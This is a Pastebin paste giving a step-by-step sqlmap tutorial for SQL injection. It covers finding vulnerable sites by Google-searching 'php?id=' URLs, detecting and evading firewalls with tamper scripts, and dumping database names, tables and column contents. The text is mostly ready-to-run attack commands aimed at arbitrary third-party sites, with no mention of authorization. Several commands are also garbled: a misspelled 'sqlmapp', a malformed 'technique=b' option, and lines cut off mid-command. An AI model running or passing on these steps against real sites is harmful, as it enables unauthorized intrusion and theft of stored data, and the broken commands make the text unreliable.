API tools faq
paste
Advertisement
--DSR--

F: sqlmap by LiTeRs50

--DSR--
May 14th, 2017
754
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.21 KB | None | 0 0
raw download clone embed print report
  1. Hey 'n welcome, today we are going to SQL inject with SQLMAP
  2. SQL can be translated to back-end databases.
  3.  
  4. We are going to split this into 3 sections, finding target, enumerating target and dumping target
  5.  
  6. ##finding target
  7. We start by finding a URL that we can use in SQLMAP
  8. A wery wide way to finding dynamic link is to google "php?id="
  9. "www.examplefind/product.php?id=200" is an example of what type of url we wanna use
  10.  
  11.  
  12.  
  13. ##enumerating target
  14. When we got the URL we start enumerating sql version and if is it behind WAF or not.
  15. If you want cheat sheet for manual checking you can find it here > http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  16. But since we are working with wide dynamic links we are going to use tools.. sqlmap
  17. It's important to check for WAF before you do anything so open up terminal and
  18. sqlmap -u "www.examplefind/product.php?id=200" --identify-waf
  19. If it finds anything you want to google the results and get the tamper script for it like --tamper="scripthere"
  20. So far so good
  21. sqlmapp -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f
  22. sqlmap is now trying to fingerprint so when its finish, we hopefully gets the sql version
  23.  
  24. For higher success rate and verbose you can use this
  25. sqlmapp -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f --random-agent --level 5 --risk 3 --time-sec=2 -v3
  26.  
  27.  
  28.  
  29. ##dumping target
  30. Lets pretend sqlmap gave us the backend database version was 'mysql', and if we were lucky it also gaved a vulnerable parameter '<just an example' with string "<just an example" and technique b
  31. Now we just
  32. sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" --dbs
  33. We should get all the databases names.
  34.  
  35. For getting tables we remove --dbs with -D <databasename> and --table
  36. v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> --table
  37.  
  38. and finally for getting the columns we do
  39. v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> -T <tablename> --columns --dump
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!